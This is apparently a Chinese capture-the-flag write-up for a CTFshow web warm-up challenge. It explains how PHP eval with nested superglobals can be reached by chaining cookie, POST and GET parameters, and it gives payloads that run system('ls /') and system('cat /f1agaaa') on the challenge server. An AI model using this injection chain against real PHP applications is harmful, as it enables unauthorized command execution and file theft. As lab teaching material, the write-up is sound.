CTFSHOW菜狗杯—WEB签到

知识点补充:

eval函数:把传入的字符串当作 PHP 代码直接执行 ,比如eval("echo 'hello';")会执行echo 'hello';

REQUEST:超全局变量, 把用户通过GET(URL 里传的参数)、POST(表单 / 接口传的参数)、COOKIE(浏览器存的参数)这三种方式传给服务器的参数,全都整合到一个 "容器" 里。

解题思路

php 复制代码
eval($_REQUEST
        [$_GET
            [$_POST
                [$_COOKIE
                    ['CTFshow-QQ群:'
                    ]
                ]
            ]
        ]
      [6][0][7][5][8][0][9][4][4]
    )
   ;

将代码规整一下后,只需要从内往外一步一步进行传参即可

1.cookie:CTFshow-QQ群

2.post_var=get_var

3.get_var=requst_var

4.requst_var=607580944

5.requst_var607580944=system('ls /')(由于这已经是最外层,在进行传参时得使用&与上一条语句进行拼接)

通过system("ls /")发现有flagaaa字样,就可以通过system("cat /f1agaaa");进行查看

相关推荐
咪库咪库咪6 小时前
Vue3-生命周期
前端
莪_幻尘6 小时前
你的 AI Skill 越多越蠢?Token 上下文爆炸的求生指南
前端·ai编程
lichenyang4537 小时前
从 has.echo 到异步 API 注册表:一次 ASCF API 回调不触发的排查复盘
前端
林瞅瞅7 小时前
Nuxt3 项目部署 Nginx 防盗链后特定 JS 文件 403 问题修复方案
前端
kyriewen7 小时前
别再每次都 Google 了:我整理了前端日常最常踩的 10 个 Git 坑,附速查表
前端·javascript·git
一颗奇趣蛋7 小时前
Web 视频开发完全指南:从入门到精通
前端
非洲农业不发达8 小时前
windows终端体验大升级,让你拥有macos级别的美化
前端·后端
妙码生花8 小时前
从 PHP 到 AI + Golang,程序员自救转型手记(十七):登录接口完善,登录页接口整合,解决跨域
前端·后端·ai编程
唐诗8 小时前
改 3 行配置,我的 Tauri dev 冷启动从 100 秒干到 4 秒
前端·客户端
SmartBoyW8 小时前
深入ECMAScript规范:彻底搞懂JS隐式类型转换与底层ToPrimitive机制
前端·javascript